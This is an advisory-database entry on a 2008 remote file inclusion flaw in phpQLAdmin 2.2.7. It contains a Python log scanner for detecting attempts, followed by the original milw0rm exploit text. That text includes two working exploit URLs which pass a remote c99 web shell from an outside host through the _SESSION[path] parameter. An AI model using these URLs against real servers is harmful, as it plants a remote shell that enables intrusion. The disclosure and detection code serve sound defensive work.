Vendor: phpQLAdmin
By: RoMaNcYxHaCkEr
CVSS: 7.5 (HIGH)
Title: Multiple Remote File Include
CWE: 98
Product Name: phpQLAdmin
Affected Version From: 2.2.2007
Affected Version To: 2.2.2007
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpqladmin:phpqladmin:2.2.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpQLAdmin 2.2.7 Multiple Remote File Include

The vulnerability exists in the ezmlm.php and update_translations.php files, which allow an attacker to include a remote file via the _SESSION[path] parameter.

Mitigation:

Upgrade to the latest version of phpQLAdmin
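
For hosts that cannot be upgraded immediately, the access logs can be checked for the request pattern described above. The following is an added example, not code from phpQLAdmin or from the advisory: it flags requests whose query string sets a _SESSION[...] key to a remote URL, generalizing from _SESSION[path] to any session key. The combined log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names that try to set a key of the PHP session array from the URL.
SESSION_KEY_RE = re.compile(r'^_SESSION\[[^\]]*\]$')
# Values that point at a remote resource rather than a local path.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)
# Scripts named in the advisory.
AFFECTED = {"ezmlm.php", "update_translations.php"}


def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    script = target.path.rsplit("/", 1)[-1].lower()
    # parse_qsl percent-decodes names and values, so _SESSION%5Bpath%5D is caught too.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if SESSION_KEY_RE.match(name) and REMOTE_RE.match(value):
            return {"script": script, "param": name, "value": value,
                    "known_affected": script in AFFECTED}
    return None


def scan(lines):
    """Return the findings for every suspicious line, in input order."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample log lines (documentation addresses and hostnames only).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Feb/2008:10:00:01 +0000] "GET /phpQLAdmin-2.2.7/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Feb/2008:10:02:13 +0000] "GET /phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=http://files.example.net/a.txt? HTTP/1.1" 200 812',
    '198.51.100.7 - - [22/Feb/2008:10:02:20 +0000] "GET /tools/update_translations.php?_SESSION%5Bpath%5D=HTTP://files.example.net/a.txt%3F HTTP/1.0" 200 640',
    '192.0.2.44 - - [22/Feb/2008:10:05:00 +0000] "GET /phpQLAdmin-2.2.7/ezmlm.php?path=/var/lib/ezmlm HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with known_affected set to False is still worth reviewing, since it shows the same parameter pattern aimed at a different script.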

Exploit-DB raw data:

# Name : phpQLAdmin 2.2.7  Multiple Remote File Include
# Download From : http://phpqladmin.com/phpQLAdmin-2.2.7.zip
# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]          
# Home Page :  WwW.4RxH.CoM  
+============================================================================+
# Vulne Code In Files ezmlm.php & update_translations.php
# Exploit :
http://www.4rxh.com/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=http://rxh.freehostia.com/shells/c99in.txt?
http://www.4rxh.com/tools/update_translations.php?_SESSION[path]=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s
Good Luck Everybody
+============================================================================+
# Greet To :
Tryag TeaM & All Members Of My Forum
# For Contact : RxH@HotMail.iT
# Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake
Best Wishes

# milw0rm.com [2008-02-22]